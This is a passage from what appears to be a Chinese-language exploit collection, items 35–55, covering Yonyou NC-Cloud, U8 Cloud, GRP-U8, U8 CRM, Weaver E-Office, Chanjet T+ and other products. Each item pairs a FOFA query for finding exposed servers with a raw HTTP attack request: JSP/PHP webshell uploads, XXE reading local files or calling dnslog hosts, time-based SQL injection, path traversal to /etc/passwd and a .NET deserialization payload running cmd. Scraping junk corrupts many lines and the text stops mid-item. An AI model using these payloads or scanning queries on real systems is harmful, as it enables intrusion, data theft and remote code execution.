User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% @. a9 H" p& [4 ]* FContent-Type: application/x-www-form-urlencoded
( n) l) K4 \9 O4 W& S3 e& ~- NAccept-Encoding: gzip, deflate: ?1 |0 w1 {# j8 Q1 m
Accept: */*
# s' m2 p3 w- f2 s. DConnection: keep-alive
6 {) }$ Y) G: N9 T( r- C/ ~0 Z* D! V: s& X* ~( O+ {, n. D6 f0 [1 S
3 @$ k1 P6 A5 z5 ^: E
35. 用友NC-Cloud importhttpscer任意文件上传
# @/ D6 K. J# z( pFOFA:app="用友-NC-Cloud"
" r( P- E. k. e4 ~* ?POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
2 G7 _# _5 ]5 C2 G: u2 \  SHost: 203.25.218.166:8888# S6 B, W) r( d$ m
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
; w/ Q, Z! ?+ ^, g# `" cAccept-Encoding: gzip, deflate
5 h- A; V+ l& x$ ?1 M$ k- F( w" CAccept: */*
$ j8 e) }) W9 p' ?7 g& cConnection: close
' }2 R6 q9 j" G0 Z3 ?( x' K8 RaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA, P9 Z4 m( G- B1 |1 ^' N+ u3 m& a
Content-Length: 190) j' _  w  d0 {/ c2 @2 T/ W0 J' E
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
. {" F) X5 f. k; @( K$ O" T6 W" d2 t* ?4 Q, T; P6 Q
--fd28cb44e829ed1c197ec3bc71748df0
8 [( S0 R# M5 i2 d+ gContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
0 i3 q4 M4 L/ V
6 s6 ^+ a" B0 V8 U" Y<%out.println(1111*1111);%>
# a% \; s2 X2 u. w$ \6 D* R--fd28cb44e829ed1c197ec3bc71748df0--" n7 x7 G0 w# v! ?

- Z$ ?3 R* j8 Y$ @. P
$ Z5 \) x, k8 }/ b36. 用友NC-Cloud soapFormat XXE- k# z7 X* f% }' D- g4 _$ _
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
6 X1 y, ?* ]( t# q7 l; MPOST /uapws/soapFormat.ajax HTTP/1.1
% q, W* C/ H, {) C* Z# ?; B4 BHost: 192.168.40.130:8989- @# _4 G* X& I$ @; B% q+ |7 ~2 R4 C8 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
" V% @# c$ H+ g0 a7 C$ I2 a0 bContent-Length: 263, p1 a6 A7 H" U, ^, T+ V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 V' ]4 H" J9 r+ X/ e+ I
Accept-Encoding: gzip, deflate
8 [& s% e5 [" g6 i( hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* {5 m6 i6 r% b& j+ Y, K. XConnection: close  N  A9 i% o' D
Content-Type: application/x-www-form-urlencoded$ ~1 G9 u5 G3 G% l) J, t: {
Upgrade-Insecure-Requests: 1& o; Z/ Y& Y( `9 F$ e

" k5 D3 f$ B$ k7 T# h; gmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
: W/ k& U7 Q, f" ^
/ G8 ~: x; |: y$ @* S8 d1 H* i* A, x; V
37. 用友NC-Cloud IUpdateService XXE
& Y  H  {+ l0 L; jFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
' _( a6 M+ R1 T# e7 j( ~POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
& J8 b& W7 a7 i( P# [Host: 192.168.40.130:89898 ]$ \' k2 b! S, Q' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36' d: s. W) K6 e. b; W* Z' a
Content-Length: 421+ c, n$ R# J$ H/ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: \- }! o/ m* _2 v& c+ z6 Z8 v/ ZAccept-Encoding: gzip, deflate
9 t8 Y6 S: M5 `* ~/ uAccept-Language: zh-CN,zh;q=0.9- e3 x% T, \" U3 a
Connection: close, D: }" p/ ~0 j: w$ z3 w
Content-Type: text/xml;charset=UTF-8
7 V/ S3 c% _9 I/ ?" QSOAPAction: urn:getResult
3 @0 I% B$ h9 V7 X8 \/ F& `Upgrade-Insecure-Requests: 1/ R. j% v% w  u$ R. h
3 {8 o4 h7 W& _+ a0 }% S: T
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
4 [' `$ E( {! x) ^' k* {- b7 G7 k<soapenv:Header/>
- v' z: [/ a& Y0 S+ k<soapenv:Body>6 j+ d7 ~* B$ u/ s  P
<iup:getResult>
+ B0 ~, f( o) b) V) D) o8 W( r7 {<!--type: string--># S( o8 G" G, z% ^
<iup:string><![CDATA[
" g. H4 g/ P7 X<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>3 ?) Y- a9 E$ Z8 n; ~8 x! B
<xxx/>]]></iup:string>
; P; Z. n9 B/ z: S</iup:getResult>
1 h6 e$ }1 `3 {9 D4 R</soapenv:Body>1 m9 r) W, \2 ]0 Q7 c
</soapenv:Envelope>5 x3 V* e3 {" l* w8 o0 ^5 p
. _4 j9 z7 b/ k0 a. M5 X0 r

- X% G) A; K8 [* I. A( c5 D5 W( \2 w- }7 r! v! J  `
38. 用友U8 Cloud smartweb2.RPC.d XXE
" v8 {* s1 \* |9 X; P* hFOFA:app="用友-U8-Cloud"1 M* H. S& b6 t
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 N* M' w% t& G3 n, `+ L6 DHost: 192.168.40.131:8088" W0 q/ ]. ^! v+ J* x: U, q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
8 Q! w$ l5 _& |4 K4 F/ q0 `Content-Length: 260. C8 e7 O+ M* Y& h& E. _) k1 x( ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 z- b' [  E0 @  I; KAccept-Encoding: gzip, deflate! O. p0 R* J8 i2 J0 q  [7 R+ x3 z1 u  d
Accept-Language: zh-CN,zh;q=0.90 b/ h, P8 a/ g  U
Connection: close
  k! m2 c( D. RContent-Type: application/x-www-form-urlencoded
% X' I5 E- M+ `2 T
# `0 ]% K- }/ ]8 \! w) i__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
4 G, e/ w9 L% X: E1 F% W7 y- }9 F% Q2 ]# n( t& l* n2 t: [& z

$ z4 m& K- i; Y# J39. 用友U8 Cloud RegisterServlet SQL注入
$ u- E6 U/ f& I" y( y  ^FOFA:title="u8c"- Z$ m: _. c+ c+ I6 |2 b0 l
POST /servlet/RegisterServlet HTTP/1.1& H8 B& z. s8 J4 J6 G( M! _; J
Host: 192.168.86.128:8089' h9 ]- C( M0 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
, H& E9 [* g" x8 V2 A8 |  fConnection: close
+ T7 \, ]* o! F3 UContent-Length: 85
+ L' a* S  Q( C0 C- ~+ M" h& WAccept: */*
/ d. [* O* ?4 _/ k; h4 ^5 W, [# lAccept-Language: en
0 m- J* J2 S& r( W  r  }Content-Type: application/x-www-form-urlencoded8 S1 H5 n  B9 ~) `. ]# h! u" ]
X-Forwarded-For: 127.0.0.1' Q* ]/ p0 {. ^! c5 `0 v/ m0 T
Accept-Encoding: gzip6 W' o2 k+ Z: `

7 b0 J% R# R* ~. J: eusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
6 u& U* b9 Y  s7 k4 d# a& R6 P  _1 C" o8 E$ L  D& f& _

  V" ~% \6 Q* B/ r4 U- l4 l  n  d8 ^40. 用友U8-Cloud XChangeServlet XXE( {: V2 q5 ]$ l1 t! x' B5 m
FOFA:app="用友-U8-Cloud"
3 S* Q# v% F: i% K& pPOST /service/XChangeServlet HTTP/1.1
( Z+ Q9 j( s) [% ^0 N' q" nHost: x.x.x.x& y" R: \5 w# N$ N- }3 I3 f+ W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 M  v: q. E/ O' h" c# mContent-Type: text/xml
$ S. @0 g7 S$ N+ X1 jConnection: close2 p* h4 X& C  g, Y  U3 X, t( C

4 w7 |0 X6 F! h+ a<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
/ @  @5 G1 W# _+ |2 ]6 g1 l6 R9 O: e. j) j+ X5 [

8 c' Y8 K) O9 _4 K/ |0 V41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
/ _( K2 t1 a" _8 I4 {FOFA:app="用友-U8-Cloud"
5 N" t4 F' F6 X1 I7 PGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
  }% q& i/ p% R0 b( Q- t- AHost:
# r: A" f* m7 m# RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" M0 o( }' w) x' V/ V( i$ I6 B
Content-Type: application/json! P6 n7 w6 C6 Y0 T- t9 D# [
Accept-Encoding: gzip
8 l5 x5 O7 ]' Y, M) uConnection: close
# i% x7 t( X) X7 [- ?) H
7 A7 K8 N; E) _& B
. y) O# ]& B, l5 U  L% i; Z, g( M42. 用友GRP-U8 SmartUpload01 文件上传
& b, j# a. C3 e- [  v# dFOFA:app="用友-GRP-U8"4 Z& N$ x4 d# o6 w- u! [
POST /u8qx/SmartUpload01.jsp HTTP/1.1
" o4 X0 J  x& v- q5 yHost: x.x.x.x
/ {. @7 Y& I1 L* @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt9 Z# q( A/ z/ p, B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36  ^/ D$ j9 H: t" [

6 }( _' ^: h& W& o. C1 C' U: n$ Y0 c1 lPAYLOAD% x; z5 l9 g% T) C& ?- c! T

& Y  G: P5 w/ l" Z
% X6 f( o  ~1 y7 dhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
9 b& l) w6 P8 Y2 z. f- Y0 M* U  e- }3 F! t6 n) P
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* ]( P7 J  Z+ b  v1 f* QFOFA:app="用友-GRP-U8"$ l1 T$ e& }8 {
POST /services/userInfoWeb HTTP/1.1
; O2 F0 H0 F" ]  ~# T; d7 p; LHost: your-ip- T% L: ~% ~  R( p$ r# q9 W: e+ L) V, y0 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
, e' ~  N0 E( o; VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; H7 n8 K/ _6 }6 l/ W: E0 QAccept-Encoding: gzip, deflate; e9 M8 C$ o& Y" W8 @; L
Accept-Language: zh-CN,zh;q=0.9
& @5 ^) Y* w3 c  V4 bConnection: close5 H; h3 h- r2 r( h3 p% S
SOAPAction:
) }- V8 t& K4 eContent-Type: text/xml;charset=UTF-8
( O/ U  [4 s  s& w; ~. P4 N
* t# M0 m4 B  _" s. F- b<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ T  q; {  g) U" ?
   <soapenv:Header/>
5 L" ]* B0 `' g! ~, q   <soapenv:Body>
  f8 X9 \' V4 h8 L/ b/ n% c      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">$ q, m$ W/ K, W1 F) H4 M/ Q5 J
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
4 d, m1 F, M- W      </ser:getUserNameById>
! F0 R" T% ^/ w# R$ Z  ^5 r/ L   </soapenv:Body>% ^' |4 m) j* f; M
</soapenv:Envelope>( t# @: e& h6 p% I3 ?

: Q- H$ X1 k6 C* ~: z# J; d
  R$ [3 U5 S! A, s% g44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 e9 L. v3 q% W" u* k  D' i  w
FOFA:app="用友-GRP-U8"
1 S2 ]1 t8 B' ]3 f; `% zGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, h) [5 D; w3 _' n
Host: your-ip
' M, B4 E4 \8 a  E9 P* m9 ], {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36$ T6 @# `  t; Q4 n5 r7 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 P7 D+ I4 Q2 }4 \/ X5 x" j
Accept-Encoding: gzip, deflate
! t& s. p2 c% |/ O8 |) j$ t  z' nAccept-Language: zh-CN,zh;q=0.9
6 \& A' I. w  i# }8 UConnection: close2 U5 V7 F/ g2 m6 m9 D3 D( j

8 K7 j8 Y1 L" T7 X. z  C+ v1 D/ o6 x2 u' d/ c
45. 用友GRP-U8 ufgovbank XXE9 Y' S5 j$ i3 X4 ^' J
FOFA:app="用友-GRP-U8"/ C# @/ N' y0 A  F# U2 g8 F9 h
POST /ufgovbank HTTP/1.1
0 x0 {# v8 C, u" z2 ^% }# z! [4 ]Host: 192.168.40.130:222
1 V" c, f9 |' OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
0 z, |: k. ?  y" OConnection: close
' T6 M% Q7 H5 z7 a: o9 eContent-Length: 161( m. e5 x$ h3 A. d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 t5 D: P( b* t* G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' V+ |  ?: b) z8 B6 K+ c, AContent-Type: application/x-www-form-urlencoded
3 G& B! a: J1 hAccept-Encoding: gzip& W3 n$ w" y. C( X) X8 R) S
0 @5 j1 \" l9 C( Z0 a6 n
reqData=<?xml version="1.0"?>
! n4 I  z$ w( s$ V, t  Z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
* [$ v( p+ S0 x9 E- X5 p4 ~8 t4 R; G+ u4 I  z+ U* T9 s

; a! G2 x- T/ R46. 用友GRP-U8 sqcxIndex.jsp SQL注入
$ Z8 s3 B. B+ aFOFA:app="用友-GRP-U8"7 F# T: e! W" T* \) C6 E
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1) S; R; o% w: Z4 b3 ]0 i6 T3 V
Host: your-ip
; I( g. ?. z4 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36+ [0 K7 Q9 C; ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; M7 n9 v% S' L3 o9 h) A
Accept-Encoding: gzip, deflate: ^4 u0 r. W# z& z* T8 t
Accept-Language: zh-CN,zh;q=0.91 [4 q2 j/ l2 H
Connection: close
* X# i: u# U6 Z' L" d& J# }# a2 O& [8 x% }
( p3 _. p6 V( x
47. 用友GRP A++Cloud 政府财务云 任意文件读取5 `) q" m$ B" Y" K: V7 {
FOFA:body="/pf/portal/login/css/fonts/style.css"
/ H) K- b' ]8 i8 b3 ?+ yGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1: l5 Y0 o. ?% {' z5 H* s5 @% g* ?
Host: x.x.x.x5 [( I$ z! g+ o; U# r4 _' \
Cache-Control: max-age=02 i+ }0 x- O7 O  V( }
Upgrade-Insecure-Requests: 1
" i3 o! B0 b* XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& D1 {$ Q- @0 e9 B: }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& U1 K6 w8 a8 \
Accept-Encoding: gzip, deflate, br2 q8 H8 b. q9 t3 T6 ^4 A4 \. A
Accept-Language: zh-CN,zh;q=0.9
% ?7 m" P+ |  [3 B% f( mIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
" r# k+ p6 o' Y- O- U' y( e, lConnection: close
& d/ S% D7 x  t3 l+ t5 B$ N" _  L' b$ C  y7 M, q/ j
/ X- U3 r: x" Q7 U* t  F/ \
: `# g: X6 M9 c4 d2 L
48. 用友U8 CRM swfupload 任意文件上传4 N% U+ q% l/ ^" Y: E' y* E. a* O
FOFA:title="用友U8CRM"
, u5 O+ Y4 E8 l" ~. s: RPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.10 `' o0 i, [6 m( m* l
Host: your-ip+ k7 |: ?1 Q) o/ M7 }& J  Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ c" H9 _: S/ ]  v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! G/ D* n0 p; o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 K/ V4 @" H. YAccept-Encoding: gzip, deflate
% E* I4 O: h! S4 A6 iContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
2 [# q& Z# p* A+ u1 f, Q, Z8 D------269520967239406871642430066855
3 w/ E( L( `) |- LContent-Disposition: form-data; name="file"; filename="s.php"
0 u: p8 W' [- b* u% Z1231, g4 W' w0 T/ R
Content-Type: application/octet-stream0 `  D5 \" p& t2 T: C
------269520967239406871642430066855
) y. O- K( c! a& }4 ]* c! QContent-Disposition: form-data; name="upload"
0 ]1 M5 U( f) s/ z5 uupload, X2 C7 X7 {  n
------269520967239406871642430066855--& n! Q4 H/ @& W3 F

! [: p# J# D5 [7 j3 k: A5 m2 g) z+ c- J6 t6 W1 u) R, H
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
: O5 v2 ?$ s6 Q. a, MFOFA:body="用友U8CRM": \5 J/ b9 ^, ~3 \; R# c

4 Y  @% @( B4 s4 Z4 z* x3 sPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1$ r1 x) p) B- b% ~8 Z# S
Host: x.x.x.x
( _( s# t- B) }% TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# f2 C/ f7 L7 F% g1 [
Content-Length: 3297 T) Q% X5 t$ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 O# U5 t0 V4 d, R( K, e0 IAccept-Encoding: gzip, deflate
1 P# i9 P' n9 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  p8 S; U' V. i; X) b7 r) F* Q
Connection: close
1 ~( ]7 T# x3 {2 r: _/ r* {( WContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w4 A; b+ L0 s7 B( u
0 m! l1 U# ?5 C* h0 d; [
-----------------------------vvv3wdayqv3yppdxvn3w- ]5 F' Z# D# Z" q* N* J/ o
Content-Disposition: form-data; name="file"; filename="%s.php ": c0 G- V7 ~% x8 C8 [$ e
Content-Type: application/octet-stream
. }" l3 K) @. l
  C) m' X* x% u0 lwersqqmlumloqa9 _7 t6 L& [( G9 [6 y  |
-----------------------------vvv3wdayqv3yppdxvn3w7 @6 n  d3 p  ?  n4 h1 Z; a
Content-Disposition: form-data; name="upload"
6 W9 d. I' J7 \! }5 p) E# K1 p9 f! @) g5 e4 U1 D7 q; t- g
upload7 [" R5 A9 w9 |! c. O* j
-----------------------------vvv3wdayqv3yppdxvn3w--
( V' @: M1 h+ s8 Z" s1 o
/ C7 M* a2 j' `; l! ^( u! X! R9 X
http://x.x.x.x/tmpfile/updB3CB.tmp.php1 ?- D' ^5 f- D% F4 ^$ F

/ O9 j+ F& t* S- E50. QDocs Smart School 6.4.1 filterRecords SQL注入. z# k( Y: l' X: {  F. m9 k6 l
FOFA:body="close closebtnmodal"
; E" p/ A$ L0 W3 }# EPOST /course/filterRecords/ HTTP/1.1  c# e( V0 ^  _5 }
Host: x.x.x.x5 L- V7 `1 `# ~6 X% O( U" N2 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: W9 f* b/ f1 g7 T& c
Connection: close
( S5 R: v: j: IContent-Length: 224
) y% v9 h7 N7 u7 {$ d8 G% u, bAccept: */*" C9 F% ]3 A; q5 d% S
Accept-Language: en
3 _- N1 W* e, X8 S0 eContent-Type: application/x-www-form-urlencoded* x, C1 `) Q- J. \5 ~
Accept-Encoding: gzip' V! S/ w. v0 K. }+ I% u& h5 Z

, Y' K6 t' R& H% F" K9 b( s) f1 w0 b' ^searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
! v5 B9 h' {! P
. K; g* ^6 `3 z$ D0 K" I
. E# d5 H/ M2 l6 \- F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
) A; p% u+ F2 _5 AFOFA:app="云时空社会化商业ERP系统"
6 t0 ^' B! N1 K$ `GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 B6 n0 ]% O2 b; Z( I6 @Host: your-ip/ |8 n5 \' [" h$ n0 p$ L5 \$ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: b# ?/ ~  G5 p7 x$ T( J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  n6 a/ t& `$ a# J9 N  pAccept-Encoding: gzip, deflate3 }: I$ B7 K* H4 \) n
Accept-Language: zh-CN,zh;q=0.9; ~1 z8 e5 B; R# s- w
Connection: close$ A! \+ W4 N$ w3 |* E8 n3 U

) i# e1 m$ c7 x: [" B! y' O, g
8 d( L; \' i& _& Z2 V: \. \: k52. 泛微E-Office json_common.php sql注入+ ~* O) }2 s7 n- i1 y5 W. m5 ?
FOFA:app="泛微-EOffice"
9 S- }/ A6 K# I8 X% ]; wPOST /building/json_common.php HTTP/1.1
1 v/ E5 l8 `# b8 O; p, N+ t* h4 w2 IHost: 192.168.86.128:8097
: G$ O: W$ t9 l" r& I+ s) UUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ `- N7 ]8 M' @' j6 c, rConnection: close/ V  G( e1 Y3 N; N! K
Content-Length: 878 J  g0 Z+ y3 h7 z" a7 j  ~  Y# w$ t
Accept: */*3 H- P& i/ \  {8 v/ n4 p5 R
Accept-Language: en4 `3 V: [6 i5 E! u3 Y* X- c
Content-Type: application/x-www-form-urlencoded
# [( ~1 f. b: ]# BAccept-Encoding: gzip, L/ B) J/ l. _* d

/ X  B$ ^! ?; _) j4 z6 @1 gtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333) p+ ~7 b; ~4 T2 J. k

3 @, _# }, P- P+ e0 M
( z: v3 q, f' S53. 迪普 DPTech VPN Service 任意文件上传
2 ?- |5 [" m4 e* dFOFA:app="DPtech-SSLVPN"1 p' N- w$ o7 A+ I+ J( {- _" e. p
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" M* _% a$ R0 A
+ {5 t7 J8 h6 x$ I/ L) E
2 y; |- B" f  G+ g7 C2 E
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# x. b3 H& ?5 r$ _) x* `FOFA:app="畅捷通-TPlus", j1 E* n9 U  ]3 @: s2 q
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件! Q) R2 s2 m4 n: P5 {
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* ^) s+ F+ W7 h. O- @. P0 _
% D+ n, L- E- H9 F" b1 F5 ?2 U- E5 M1 v6 F3 W) p& q
完整数据包4 O5 `1 G3 ]3 I# o
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1. J* U) Z$ i" a! E! `- \. G
Host: x.x.x.x) ^" \/ B9 A+ M- }7 m; S  [8 Y1 c
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F* S/ ]( c% U, [7 Y7 A
Content-Length: 593
  [% s# p1 p: }% q$ p- S
1 S5 R, ?) P+ @  D{" _4 T4 M. j8 ]: U( _. W, q
"storeID":{' C) q# Z/ I! E0 d' N9 _9 V
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" Z1 E) o) K* X! G" e$ L; m7 n "MethodName":"Start",* `; W3 F$ }& n% I2 i* Y/ K' ]
  "ObjectInstance":{
1 B9 P" H& B2 V( W" q0 c& R   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, _9 R: L* ~0 ?4 O- f* x$ B
    "StartInfo":{
" r% D+ ]# B" w* ^3 P- O   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% U& s' E+ ]' [, F9 F! s
    "FileName":"cmd",  M4 r0 `1 l, w# |6 }$ c
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% Q) Z; L5 _8 ^: L4 j
    }) O6 W$ g  R% j# [/ X' A* i& K4 }
  }, B+ ]# r# v" M$ V9 Y/ E
  }! Q) w. J+ a( b
}
+ y% @& \% a" ]
- a/ X; @7 u8 k0 S+ U2 Y1 \7 w
" i) i4 a# `" ^; I- x8 ^第二步,访问如下url# Q. V! X+ k- D8 Q4 e* @+ o
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt  D- v# q9 c% M' ^7 I4 `& M' K
5 y3 j& e7 {" x$ L9 K0 N
' m5 n* U: H' P, @8 r. p2 r
55. 畅捷通T+ getdecallusers信息泄露+ |, G3 z( b" w0 A
FOFA:app="畅捷通-TPlus"$ ~! H! }2 h" U& |- J' c8 U
第一步,通过
